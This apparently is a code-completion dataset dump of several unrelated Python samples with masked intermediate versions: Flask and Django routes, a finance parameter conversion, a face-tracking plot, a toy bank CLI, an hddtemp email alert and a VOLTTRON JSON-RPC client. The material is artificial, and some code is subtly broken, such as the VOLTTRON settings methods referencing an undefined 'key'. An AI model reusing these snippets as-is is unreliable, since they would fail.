make_response(jsonify(results)), 200\n\n @app.route('/api/ng_event/dowfreq', methods=['GET'])\n def dowfreq():\n\n results = []\n for result in db.session.query(DOWFrequency.type_visitor, DOWFrequency.start_dow, DOWFrequency.start_hour, DOWFrequency.count).all():\n results.append({'type_visitor' : result.type_visitor, 'start_dow' : result.start_dow, 'start_hour' : result.start_hour, 'count' : result.count })\n\n return make_response(jsonify(results)), 200\n\n return app\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
from django.urls import path,include
from Income import views
urlpatterns = [
path('IncomeHome/',views.IncomeHome,name='IncomeHome'),
path('IncomeCreate/',views.IncomeCreate.as_view(),name='IncomeCreate'),
path('IncomeUpdate/<int:pk>',views.IncomeUpdate.as_view(),name='IncomeUpdate'),
path('IncomeDelete/<int:pk>',views.IncomeDelete.as_view(),name='IncomeDelete'),
path('Income/',views.IncomeView.as_view(),name='Income'),
]
|
normal
|
{
"blob_id": "ad3a7221883a847fc9d26097c3801973cbbda38e",
"index": 355,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nurlpatterns = [path('IncomeHome/', views.IncomeHome, name='IncomeHome'),\n path('IncomeCreate/', views.IncomeCreate.as_view(), name='IncomeCreate'\n ), path('IncomeUpdate/<int:pk>', views.IncomeUpdate.as_view(), name=\n 'IncomeUpdate'), path('IncomeDelete/<int:pk>', views.IncomeDelete.\n as_view(), name='IncomeDelete'), path('Income/', views.IncomeView.\n as_view(), name='Income')]\n",
"step-3": "from django.urls import path, include\nfrom Income import views\nurlpatterns = [path('IncomeHome/', views.IncomeHome, name='IncomeHome'),\n path('IncomeCreate/', views.IncomeCreate.as_view(), name='IncomeCreate'\n ), path('IncomeUpdate/<int:pk>', views.IncomeUpdate.as_view(), name=\n 'IncomeUpdate'), path('IncomeDelete/<int:pk>', views.IncomeDelete.\n as_view(), name='IncomeDelete'), path('Income/', views.IncomeView.\n as_view(), name='Income')]\n",
"step-4": "\nfrom django.urls import path,include\n\nfrom Income import views\n\nurlpatterns = [\n path('IncomeHome/',views.IncomeHome,name='IncomeHome'),\n path('IncomeCreate/',views.IncomeCreate.as_view(),name='IncomeCreate'),\n path('IncomeUpdate/<int:pk>',views.IncomeUpdate.as_view(),name='IncomeUpdate'),\n path('IncomeDelete/<int:pk>',views.IncomeDelete.as_view(),name='IncomeDelete'),\n path('Income/',views.IncomeView.as_view(),name='Income'),\n\n]\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
from numpy import sqrt
def Schout2ConTank(a, b, d):
# This function converts parameters from Schoutens notation to Cont-Tankov
# notation
## Code
th = d * b / sqrt(a ** 2 - b ** 2)
k = 1 / (d * sqrt(a ** 2 - b ** 2))
s = sqrt(d / sqrt(a ** 2 - b ** 2))
return th, k, s
|
normal
|
{
"blob_id": "4dda122a8c3a2aab62bb202945f6fb9cb73cf772",
"index": 8330,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef Schout2ConTank(a, b, d):\n th = d * b / sqrt(a ** 2 - b ** 2)\n k = 1 / (d * sqrt(a ** 2 - b ** 2))\n s = sqrt(d / sqrt(a ** 2 - b ** 2))\n return th, k, s\n",
"step-3": "from numpy import sqrt\n\n\ndef Schout2ConTank(a, b, d):\n th = d * b / sqrt(a ** 2 - b ** 2)\n k = 1 / (d * sqrt(a ** 2 - b ** 2))\n s = sqrt(d / sqrt(a ** 2 - b ** 2))\n return th, k, s\n",
"step-4": "from numpy import sqrt\n\n\ndef Schout2ConTank(a, b, d):\n # This function converts parameters from Schoutens notation to Cont-Tankov\n # notation\n\n ## Code\n th = d * b / sqrt(a ** 2 - b ** 2)\n k = 1 / (d * sqrt(a ** 2 - b ** 2))\n s = sqrt(d / sqrt(a ** 2 - b ** 2))\n return th, k, s\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
plt.style.use('seaborn')
def animate(i):
data = pd.read_csv('data.csv')
global x_vals
global counter
x_vals.append(counter)
try:
x = data.iloc[x_vals, 0]
y = data.iloc[x_vals, 1]
if counter > 10:
x_vals.pop(0)
plt.cla()
axes = plt.gca()
axes.set_ylim([0, 30])
counter = counter + 1
height = root.winfo_screenheight()
width = root.winfo_screenwidth()
screen_x1 = width / 2
screen_y1 = height / 2
X = screen_x1 - face_x2
Y = screen_y1 - face_y2
d_x = X * X
d_y = Y * Y
D = d_x + d_y
distance = math.sqrt(D)
plt.scatter(counter, distance, s=50, linewidth=1)
plt.xlabel('Time')
plt.ylabel('Movement of student from the center of screen')
plt.tight_layout()
except IndexError as e:
print('Graph ended')
exit(0)
<|reserved_special_token_0|>
plt.savefig('Scatter_Graph.png')
plt.tight_layout()
plt.show()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
x_vals = []
root = Tk()
counter = 0
plt.style.use('seaborn')
def animate(i):
data = pd.read_csv('data.csv')
global x_vals
global counter
x_vals.append(counter)
try:
x = data.iloc[x_vals, 0]
y = data.iloc[x_vals, 1]
if counter > 10:
x_vals.pop(0)
plt.cla()
axes = plt.gca()
axes.set_ylim([0, 30])
counter = counter + 1
height = root.winfo_screenheight()
width = root.winfo_screenwidth()
screen_x1 = width / 2
screen_y1 = height / 2
X = screen_x1 - face_x2
Y = screen_y1 - face_y2
d_x = X * X
d_y = Y * Y
D = d_x + d_y
distance = math.sqrt(D)
plt.scatter(counter, distance, s=50, linewidth=1)
plt.xlabel('Time')
plt.ylabel('Movement of student from the center of screen')
plt.tight_layout()
except IndexError as e:
print('Graph ended')
exit(0)
ani = FuncAnimation(plt.gcf(), animate, interval=1000)
plt.savefig('Scatter_Graph.png')
plt.tight_layout()
plt.show()
<|reserved_special_token_1|>
import pandas as pd
import matplotlib.pyplot as plt
from matplotlib.animation import FuncAnimation
import math
from tkinter import *
from tkinter.ttk import *
from facedetectandtrack import *
x_vals = []
root = Tk()
counter = 0
plt.style.use('seaborn')
def animate(i):
data = pd.read_csv('data.csv')
global x_vals
global counter
x_vals.append(counter)
try:
x = data.iloc[x_vals, 0]
y = data.iloc[x_vals, 1]
if counter > 10:
x_vals.pop(0)
plt.cla()
axes = plt.gca()
axes.set_ylim([0, 30])
counter = counter + 1
height = root.winfo_screenheight()
width = root.winfo_screenwidth()
screen_x1 = width / 2
screen_y1 = height / 2
X = screen_x1 - face_x2
Y = screen_y1 - face_y2
d_x = X * X
d_y = Y * Y
D = d_x + d_y
distance = math.sqrt(D)
plt.scatter(counter, distance, s=50, linewidth=1)
plt.xlabel('Time')
plt.ylabel('Movement of student from the center of screen')
plt.tight_layout()
except IndexError as e:
print('Graph ended')
exit(0)
ani = FuncAnimation(plt.gcf(), animate, interval=1000)
plt.savefig('Scatter_Graph.png')
plt.tight_layout()
plt.show()
<|reserved_special_token_1|>
import pandas as pd
import matplotlib.pyplot as plt
from matplotlib.animation import FuncAnimation
import math
from tkinter import *
from tkinter.ttk import *
from facedetectandtrack import *
x_vals = []
root = Tk()
counter=0
#def graph():
plt.style.use('seaborn')
def animate(i):
data = pd.read_csv('data.csv')
global x_vals
global counter
x_vals.append(counter)
try:
x = data.iloc[x_vals,0]
y = data.iloc[x_vals,1]
if counter>10:
x_vals.pop(0)
plt.cla()
axes=plt.gca()
axes.set_ylim([0,30])
#plt.plot(x, y)
counter=counter+1
height = root.winfo_screenheight()
width = root.winfo_screenwidth()
screen_x1 = width/2
screen_y1 = height/2
X = screen_x1 - face_x2
Y = screen_y1 - face_y2
d_x = (X*X)
d_y = (Y*Y)
D = d_x + d_y
distance = math.sqrt(D)
#print(distance)
plt.scatter(counter ,distance, s= 50,linewidth=1)
plt.xlabel("Time")
plt.ylabel("Movement of student from the center of screen")
plt.tight_layout()
except IndexError as e:
print('Graph ended')
exit(0)
ani = FuncAnimation(plt.gcf(), animate, interval=1000)
plt.savefig("Scatter_Graph.png")
plt.tight_layout()
plt.show()
|
flexible
|
{
"blob_id": "239f055fd76a3ecb5f384c256ad850ea42739b8f",
"index": 9710,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nplt.style.use('seaborn')\n\n\ndef animate(i):\n data = pd.read_csv('data.csv')\n global x_vals\n global counter\n x_vals.append(counter)\n try:\n x = data.iloc[x_vals, 0]\n y = data.iloc[x_vals, 1]\n if counter > 10:\n x_vals.pop(0)\n plt.cla()\n axes = plt.gca()\n axes.set_ylim([0, 30])\n counter = counter + 1\n height = root.winfo_screenheight()\n width = root.winfo_screenwidth()\n screen_x1 = width / 2\n screen_y1 = height / 2\n X = screen_x1 - face_x2\n Y = screen_y1 - face_y2\n d_x = X * X\n d_y = Y * Y\n D = d_x + d_y\n distance = math.sqrt(D)\n plt.scatter(counter, distance, s=50, linewidth=1)\n plt.xlabel('Time')\n plt.ylabel('Movement of student from the center of screen')\n plt.tight_layout()\n except IndexError as e:\n print('Graph ended')\n exit(0)\n\n\n<mask token>\nplt.savefig('Scatter_Graph.png')\nplt.tight_layout()\nplt.show()\n",
"step-3": "<mask token>\nx_vals = []\nroot = Tk()\ncounter = 0\nplt.style.use('seaborn')\n\n\ndef animate(i):\n data = pd.read_csv('data.csv')\n global x_vals\n global counter\n x_vals.append(counter)\n try:\n x = data.iloc[x_vals, 0]\n y = data.iloc[x_vals, 1]\n if counter > 10:\n x_vals.pop(0)\n plt.cla()\n axes = plt.gca()\n axes.set_ylim([0, 30])\n counter = counter + 1\n height = root.winfo_screenheight()\n width = root.winfo_screenwidth()\n screen_x1 = width / 2\n screen_y1 = height / 2\n X = screen_x1 - face_x2\n Y = screen_y1 - face_y2\n d_x = X * X\n d_y = Y * Y\n D = d_x + d_y\n distance = math.sqrt(D)\n plt.scatter(counter, distance, s=50, linewidth=1)\n plt.xlabel('Time')\n plt.ylabel('Movement of student from the center of screen')\n plt.tight_layout()\n except IndexError as e:\n print('Graph ended')\n exit(0)\n\n\nani = FuncAnimation(plt.gcf(), animate, interval=1000)\nplt.savefig('Scatter_Graph.png')\nplt.tight_layout()\nplt.show()\n",
"step-4": "import pandas as pd\nimport matplotlib.pyplot as plt\nfrom matplotlib.animation import FuncAnimation\nimport math\nfrom tkinter import *\nfrom tkinter.ttk import *\nfrom facedetectandtrack import *\nx_vals = []\nroot = Tk()\ncounter = 0\nplt.style.use('seaborn')\n\n\ndef animate(i):\n data = pd.read_csv('data.csv')\n global x_vals\n global counter\n x_vals.append(counter)\n try:\n x = data.iloc[x_vals, 0]\n y = data.iloc[x_vals, 1]\n if counter > 10:\n x_vals.pop(0)\n plt.cla()\n axes = plt.gca()\n axes.set_ylim([0, 30])\n counter = counter + 1\n height = root.winfo_screenheight()\n width = root.winfo_screenwidth()\n screen_x1 = width / 2\n screen_y1 = height / 2\n X = screen_x1 - face_x2\n Y = screen_y1 - face_y2\n d_x = X * X\n d_y = Y * Y\n D = d_x + d_y\n distance = math.sqrt(D)\n plt.scatter(counter, distance, s=50, linewidth=1)\n plt.xlabel('Time')\n plt.ylabel('Movement of student from the center of screen')\n plt.tight_layout()\n except IndexError as e:\n print('Graph ended')\n exit(0)\n\n\nani = FuncAnimation(plt.gcf(), animate, interval=1000)\nplt.savefig('Scatter_Graph.png')\nplt.tight_layout()\nplt.show()\n",
"step-5": "\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom matplotlib.animation import FuncAnimation\nimport math\nfrom tkinter import * \nfrom tkinter.ttk import *\nfrom facedetectandtrack import *\n \nx_vals = []\nroot = Tk()\n\n\ncounter=0\n#def graph():\nplt.style.use('seaborn')\n\ndef animate(i):\n data = pd.read_csv('data.csv')\n global x_vals\n global counter\n x_vals.append(counter)\n try:\n x = data.iloc[x_vals,0]\n y = data.iloc[x_vals,1] \n if counter>10:\n x_vals.pop(0)\n\n plt.cla()\n axes=plt.gca()\n axes.set_ylim([0,30])\n #plt.plot(x, y)\n counter=counter+1\n\n height = root.winfo_screenheight() \n width = root.winfo_screenwidth() \n screen_x1 = width/2\n screen_y1 = height/2\n X = screen_x1 - face_x2\n Y = screen_y1 - face_y2\n d_x = (X*X)\n d_y = (Y*Y)\n D = d_x + d_y\n distance = math.sqrt(D)\n #print(distance)\n plt.scatter(counter ,distance, s= 50,linewidth=1)\n\n plt.xlabel(\"Time\")\n plt.ylabel(\"Movement of student from the center of screen\")\n\n\n plt.tight_layout()\n except IndexError as e:\n print('Graph ended')\n exit(0)\n\nani = FuncAnimation(plt.gcf(), animate, interval=1000)\nplt.savefig(\"Scatter_Graph.png\")\n\nplt.tight_layout()\nplt.show()",
"step-ids": [
0,
2,
3,
4,
5
]
}
|
[
0,
2,
3,
4,
5
] |
#!/usr/bin/env python3
import sql_manager
import Client
from getpass import getpass
from settings import EXIT_CMD
def main_menu():
print("""Welcome to our bank service. You are not logged in.
Please register or login""")
while True:
command = input("guest@hackabank$ ")
if command == "register":
username = input("Enter your username: ")
password = getpass(prompt="Enter your password: ")
sql_manager.register(username, password)
print("Registration Successfull")
elif command == "login":
username = input("Enter your username: ")
password = getpass(prompt="Enter your password: ")
logged_user = sql_manager.login(username, password)
if logged_user:
logged_menu(logged_user)
else:
print("Login failed")
continue
elif command == "help":
print("""login - for logging in!
register - for creating new account!
exit - for closing program!""")
elif command == "exit":
break
else:
print("Not a valid command")
continue
def logged_menu(logged_user):
print("Welcome you are logged in as: " + logged_user.get_username())
while True:
command = input("{}@hackabank# ".format(logged_user.get_username()))
if command == "info":
print("You are: " + logged_user.get_username())
print("Your id is: " + str(logged_user.get_id()))
print("Your balance is:" + str(logged_user.get_balance()) + "$")
elif command == "changepass":
new_pass = input("Enter your new password: ")
sql_manager.change_pass(new_pass, logged_user)
elif command == "change-message":
new_message = input("Enter your new message: ")
sql_manager.change_message(new_message, logged_user)
elif command == "show-message":
print(logged_user.get_message())
elif command == "help":
print("info - for showing account info")
print("changepass - for changing passowrd")
print("change-message - for changing users message")
print("show-message - for showing users message")
elif command in EXIT_CMD:
break
else:
print("Not such a command!")
continue
|
normal
|
{
"blob_id": "ee4fd4aef7ecdfbc8ff53028fdedc558814f46a7",
"index": 2383,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef logged_menu(logged_user):\n print('Welcome you are logged in as: ' + logged_user.get_username())\n while True:\n command = input('{}@hackabank# '.format(logged_user.get_username()))\n if command == 'info':\n print('You are: ' + logged_user.get_username())\n print('Your id is: ' + str(logged_user.get_id()))\n print('Your balance is:' + str(logged_user.get_balance()) + '$')\n elif command == 'changepass':\n new_pass = input('Enter your new password: ')\n sql_manager.change_pass(new_pass, logged_user)\n elif command == 'change-message':\n new_message = input('Enter your new message: ')\n sql_manager.change_message(new_message, logged_user)\n elif command == 'show-message':\n print(logged_user.get_message())\n elif command == 'help':\n print('info - for showing account info')\n print('changepass - for changing passowrd')\n print('change-message - for changing users message')\n print('show-message - for showing users message')\n elif command in EXIT_CMD:\n break\n else:\n print('Not such a command!')\n continue\n",
"step-3": "<mask token>\n\n\ndef main_menu():\n print(\n \"\"\"Welcome to our bank service. You are not logged in.\n Please register or login\"\"\"\n )\n while True:\n command = input('guest@hackabank$ ')\n if command == 'register':\n username = input('Enter your username: ')\n password = getpass(prompt='Enter your password: ')\n sql_manager.register(username, password)\n print('Registration Successfull')\n elif command == 'login':\n username = input('Enter your username: ')\n password = getpass(prompt='Enter your password: ')\n logged_user = sql_manager.login(username, password)\n if logged_user:\n logged_menu(logged_user)\n else:\n print('Login failed')\n continue\n elif command == 'help':\n print(\n \"\"\"login - for logging in!\n register - for creating new account!\n exit - for closing program!\"\"\"\n )\n elif command == 'exit':\n break\n else:\n print('Not a valid command')\n continue\n\n\ndef logged_menu(logged_user):\n print('Welcome you are logged in as: ' + logged_user.get_username())\n while True:\n command = input('{}@hackabank# '.format(logged_user.get_username()))\n if command == 'info':\n print('You are: ' + logged_user.get_username())\n print('Your id is: ' + str(logged_user.get_id()))\n print('Your balance is:' + str(logged_user.get_balance()) + '$')\n elif command == 'changepass':\n new_pass = input('Enter your new password: ')\n sql_manager.change_pass(new_pass, logged_user)\n elif command == 'change-message':\n new_message = input('Enter your new message: ')\n sql_manager.change_message(new_message, logged_user)\n elif command == 'show-message':\n print(logged_user.get_message())\n elif command == 'help':\n print('info - for showing account info')\n print('changepass - for changing passowrd')\n print('change-message - for changing users message')\n print('show-message - for showing users message')\n elif command in EXIT_CMD:\n break\n else:\n print('Not such a command!')\n continue\n",
"step-4": "import sql_manager\nimport Client\nfrom getpass import getpass\nfrom settings import EXIT_CMD\n\n\ndef main_menu():\n print(\n \"\"\"Welcome to our bank service. You are not logged in.\n Please register or login\"\"\"\n )\n while True:\n command = input('guest@hackabank$ ')\n if command == 'register':\n username = input('Enter your username: ')\n password = getpass(prompt='Enter your password: ')\n sql_manager.register(username, password)\n print('Registration Successfull')\n elif command == 'login':\n username = input('Enter your username: ')\n password = getpass(prompt='Enter your password: ')\n logged_user = sql_manager.login(username, password)\n if logged_user:\n logged_menu(logged_user)\n else:\n print('Login failed')\n continue\n elif command == 'help':\n print(\n \"\"\"login - for logging in!\n register - for creating new account!\n exit - for closing program!\"\"\"\n )\n elif command == 'exit':\n break\n else:\n print('Not a valid command')\n continue\n\n\ndef logged_menu(logged_user):\n print('Welcome you are logged in as: ' + logged_user.get_username())\n while True:\n command = input('{}@hackabank# '.format(logged_user.get_username()))\n if command == 'info':\n print('You are: ' + logged_user.get_username())\n print('Your id is: ' + str(logged_user.get_id()))\n print('Your balance is:' + str(logged_user.get_balance()) + '$')\n elif command == 'changepass':\n new_pass = input('Enter your new password: ')\n sql_manager.change_pass(new_pass, logged_user)\n elif command == 'change-message':\n new_message = input('Enter your new message: ')\n sql_manager.change_message(new_message, logged_user)\n elif command == 'show-message':\n print(logged_user.get_message())\n elif command == 'help':\n print('info - for showing account info')\n print('changepass - for changing passowrd')\n print('change-message - for changing users message')\n print('show-message - for showing users message')\n elif command in EXIT_CMD:\n break\n else:\n print('Not such a command!')\n continue\n",
"step-5": "#!/usr/bin/env python3\nimport sql_manager\nimport Client\nfrom getpass import getpass\nfrom settings import EXIT_CMD\n\n\ndef main_menu():\n print(\"\"\"Welcome to our bank service. You are not logged in.\n Please register or login\"\"\")\n\n while True:\n command = input(\"guest@hackabank$ \")\n\n if command == \"register\":\n username = input(\"Enter your username: \")\n password = getpass(prompt=\"Enter your password: \")\n sql_manager.register(username, password)\n print(\"Registration Successfull\")\n elif command == \"login\":\n username = input(\"Enter your username: \")\n password = getpass(prompt=\"Enter your password: \")\n logged_user = sql_manager.login(username, password)\n\n if logged_user:\n logged_menu(logged_user)\n else:\n print(\"Login failed\")\n continue\n\n elif command == \"help\":\n print(\"\"\"login - for logging in!\n register - for creating new account!\n exit - for closing program!\"\"\")\n\n elif command == \"exit\":\n break\n\n else:\n print(\"Not a valid command\")\n continue\n\n\ndef logged_menu(logged_user):\n print(\"Welcome you are logged in as: \" + logged_user.get_username())\n while True:\n command = input(\"{}@hackabank# \".format(logged_user.get_username()))\n\n if command == \"info\":\n print(\"You are: \" + logged_user.get_username())\n print(\"Your id is: \" + str(logged_user.get_id()))\n print(\"Your balance is:\" + str(logged_user.get_balance()) + \"$\")\n\n elif command == \"changepass\":\n new_pass = input(\"Enter your new password: \")\n sql_manager.change_pass(new_pass, logged_user)\n\n elif command == \"change-message\":\n new_message = input(\"Enter your new message: \")\n sql_manager.change_message(new_message, logged_user)\n\n elif command == \"show-message\":\n print(logged_user.get_message())\n\n elif command == \"help\":\n print(\"info - for showing account info\")\n print(\"changepass - for changing passowrd\")\n print(\"change-message - for changing users message\")\n print(\"show-message - for showing users message\")\n elif command in EXIT_CMD:\n break\n else:\n print(\"Not such a command!\")\n continue\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
text += '\nHostname: ' + os.uname().nodename
emailgen.sendAlert(recipient, subject, text, sender, password)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
recipient = input('recipient: ')
sender = input('sender: ')
password = input('sender password: ')
subject = 'hdd temp alert'
output = subprocess.check_output('sudo hddtemp /dev/sda /dev/sdb /dev/sdc',
shell=True)
text = output.decode('utf-8')
text = text.encode('ascii', 'ignore')
text = text.decode('ascii')
text += '\nHostname: ' + os.uname().nodename
emailgen.sendAlert(recipient, subject, text, sender, password)
<|reserved_special_token_1|>
import os
import subprocess
import emailgen
recipient = input('recipient: ')
sender = input('sender: ')
password = input('sender password: ')
subject = 'hdd temp alert'
output = subprocess.check_output('sudo hddtemp /dev/sda /dev/sdb /dev/sdc',
shell=True)
text = output.decode('utf-8')
text = text.encode('ascii', 'ignore')
text = text.decode('ascii')
text += '\nHostname: ' + os.uname().nodename
emailgen.sendAlert(recipient, subject, text, sender, password)
<|reserved_special_token_1|>
#!/usr/bin/env python3
import os
import subprocess
import emailgen
#
# Header information
#
recipient = input("recipient: ")
sender = input("sender: ")
password = input("sender password: ")
subject = "hdd temp alert"
#
# Get hdd temp, format for email
#
output = subprocess.check_output('sudo hddtemp /dev/sda /dev/sdb /dev/sdc', shell=True)
text = output.decode('utf-8')
#
# Email requires ascii
#
text = text.encode('ascii','ignore')
text = text.decode('ascii')
#
# Add descriptive information to text
#
text += "\nHostname: " + os.uname().nodename
#
# Call sendAlert function
#
emailgen.sendAlert(recipient, subject, text, sender, password)
|
flexible
|
{
"blob_id": "26a6fe0b2a98aa77b63a336cd6c2afcfe81d9058",
"index": 7680,
"step-1": "<mask token>\n",
"step-2": "<mask token>\ntext += '\\nHostname: ' + os.uname().nodename\nemailgen.sendAlert(recipient, subject, text, sender, password)\n",
"step-3": "<mask token>\nrecipient = input('recipient: ')\nsender = input('sender: ')\npassword = input('sender password: ')\nsubject = 'hdd temp alert'\noutput = subprocess.check_output('sudo hddtemp /dev/sda /dev/sdb /dev/sdc',\n shell=True)\ntext = output.decode('utf-8')\ntext = text.encode('ascii', 'ignore')\ntext = text.decode('ascii')\ntext += '\\nHostname: ' + os.uname().nodename\nemailgen.sendAlert(recipient, subject, text, sender, password)\n",
"step-4": "import os\nimport subprocess\nimport emailgen\nrecipient = input('recipient: ')\nsender = input('sender: ')\npassword = input('sender password: ')\nsubject = 'hdd temp alert'\noutput = subprocess.check_output('sudo hddtemp /dev/sda /dev/sdb /dev/sdc',\n shell=True)\ntext = output.decode('utf-8')\ntext = text.encode('ascii', 'ignore')\ntext = text.decode('ascii')\ntext += '\\nHostname: ' + os.uname().nodename\nemailgen.sendAlert(recipient, subject, text, sender, password)\n",
"step-5": "#!/usr/bin/env python3\nimport os\nimport subprocess\nimport emailgen\n\n\n#\n# Header information\n#\nrecipient = input(\"recipient: \")\nsender = input(\"sender: \")\npassword = input(\"sender password: \")\nsubject = \"hdd temp alert\"\n\n#\n# Get hdd temp, format for email\n#\noutput = subprocess.check_output('sudo hddtemp /dev/sda /dev/sdb /dev/sdc', shell=True)\ntext = output.decode('utf-8')\n\n#\n# Email requires ascii\n#\ntext = text.encode('ascii','ignore')\ntext = text.decode('ascii')\n\n#\n# Add descriptive information to text\n#\ntext += \"\\nHostname: \" + os.uname().nodename\n\n#\n# Call sendAlert function\n#\nemailgen.sendAlert(recipient, subject, text, sender, password)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# -*- coding: utf-8 -*- {{{
# vim: set fenc=utf-8 ft=python sw=4 ts=4 sts=4 et:
# Copyright (c) 2017, Battelle Memorial Institute
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# The views and conclusions contained in the software and documentation
# are those of the authors and should not be interpreted as representing
# official policies, either expressed or implied, of the FreeBSD
# Project.
#
# This material was prepared as an account of work sponsored by an
# agency of the United States Government. Neither the United States
# Government nor the United States Department of Energy, nor Battelle,
# nor any of their employees, nor any jurisdiction or organization that
# has cooperated in the development of these materials, makes any
# warranty, express or implied, or assumes any legal liability or
# responsibility for the accuracy, completeness, or usefulness or any
# information, apparatus, product, software, or process disclosed, or
# represents that its use would not infringe privately owned rights.
#
# Reference herein to any specific commercial product, process, or
# service by trade name, trademark, manufacturer, or otherwise does not
# necessarily constitute or imply its endorsement, recommendation, or
# favoring by the United States Government or any agency thereof, or
# Battelle Memorial Institute. The views and opinions of authors
# expressed herein do not necessarily state or reflect those of the
# United States Government or any agency thereof.
#
# PACIFIC NORTHWEST NATIONAL LABORATORY
# operated by BATTELLE for the UNITED STATES DEPARTMENT OF ENERGY
# under Contract DE-AC05-76RL01830
# }}}
import requests
"""
This example exposes the VOLTTRON web API
through a python class that that does not depend
on VOLTTRON proper. A VOLTTRON Central Agent must
be running on the url passed to the constructor.
"""
class VolttronWebRPC(object):
def __init__(self, url, username='admin', password='admin'):
"""
:param url: Jsonrpc endpoint for posting data.
:param username:
:param password:
"""
self._url = url
self._username = username
self._password = password
self._auth_token = None
self._auth_token = self.get_auth_token()
def do_rpc(self, method, **params):
"""
Generic method to request data from Volttron Central
:param method: Method to call
:param params: Any method specific keyword arguments
"""
data = {
'jsonrpc': '2.0',
'method': method,
'params': params,
'authorization': self._auth_token,
'id': '1'
}
r = requests.post(self._url, json=data)
validate_response(r)
return r.json()['result']
def get_auth_token(self):
"""
Get an authorization token from Volttron Central,
automatically called when the object is created
"""
return self.do_rpc('get_authorization',
username=self._username,
password=self._password)
def register_instance(self, addr, name=None):
"""
Register a platform with Volttron Central
:param addr: Platform's discovery address that will be registered
"""
return self.do_rpc('register_instance',discovery_address=addr,
display_name=name)
def list_platforms(self):
"""
Get a list of registered platforms from Volttron Central.
"""
return self.do_rpc('list_platforms')
def install_agent(self, platform_uuid, fileargs):
"""
Install an agent on a platform
:param platform_uuid: uuid of platform where agent will be installed
:param fileargs: arguments for installing the agent
"""
rpc = 'platforms.uuid.{}.install'.format(platform_uuid)
return self.do_rpc(rpc, files=[fileargs])
def list_agents(self, platform_uuid):
"""
List agents installed on a platform
"""
return self.do_rpc('platforms.uuid.' + platform_uuid + '.list_agents')
def unregister_platform(self, platform_uuid):
"""
Unregister a platform with Volttron Central
"""
return self.do_rpc('unregister_platform', platform_uuid=platform_uuid)
def store_agent_config(self, platform_uuid, agent_identity, config_name,
raw_contents, config_type="json"):
"""
Add a file to the an agent's config store
:param platform_uuid: uuid of platform where agent will is installed
:param agent_identity: VIP identity of agent that will own the config
:param config_name: name of the configuration file
:param raw_contents: file data
"""
params = dict(platform_uuid=platform_uuid,
agent_identity=agent_identity,
config_name=config_name,
raw_contents=raw_contents,
config_type=config_type)
return self.do_rpc("store_agent_config", **params)
def list_agent_configs(self, platform_uuid, agent_identity):
"""
List the configuration files stored for an agent.
:param platform_uuid: uuid of platform where agent is installed
:param agent_identity: VIP identity of agent that owns the configs
"""
params = dict(platform_uuid=platform_uuid,
agent_identity=agent_identity)
return self.do_rpc("list_agent_configs", **params)
def get_agent_config(self, platform_uuid, agent_identity, config_name,
raw=True):
"""
Get a config file from an agent's Configuration Store
:param platform_uuid: uuid of platform where agent is installed
:param agent_identity: VIP identity of agent that owns the config
:param config_name: name of the configuration file
"""
params = dict(platform_uuid=platform_uuid,
agent_identity=agent_identity,
config_name=config_name,
raw=raw)
return self.do_rpc("get_agent_config", **params)
def set_setting(self, setting, value):
"""
Assign a value to a setting in Volttron Central
:param setting: Name of the setting to set
:param value: Value to assign to setting
"""
return self.do_rpc("set_setting", key=key, value=value)
def get_setting(self, setting):
"""
Get the value of a setting in Volttron Central
:param setting: Name of the setting to get
"""
return self.do_rpc("get_setting", key=key)
def get_setting_keys(self):
"""
Get a list of settings in Volttorn Central
"""
return self.do_rpc("get_setting_keys")
def validate_response(response):
"""
Validate that the message is a json-rpc response.
:param response:
:return:
"""
assert response.ok
rpcdict = response.json()
assert rpcdict['jsonrpc'] == '2.0'
assert rpcdict['id']
assert 'error' in rpcdict.keys() or 'result' in rpcdict.keys()
|
normal
|
{
"blob_id": "6fdfcbcfdf2b680a1fbdb74f77fd5d1a9f7eac0b",
"index": 6105,
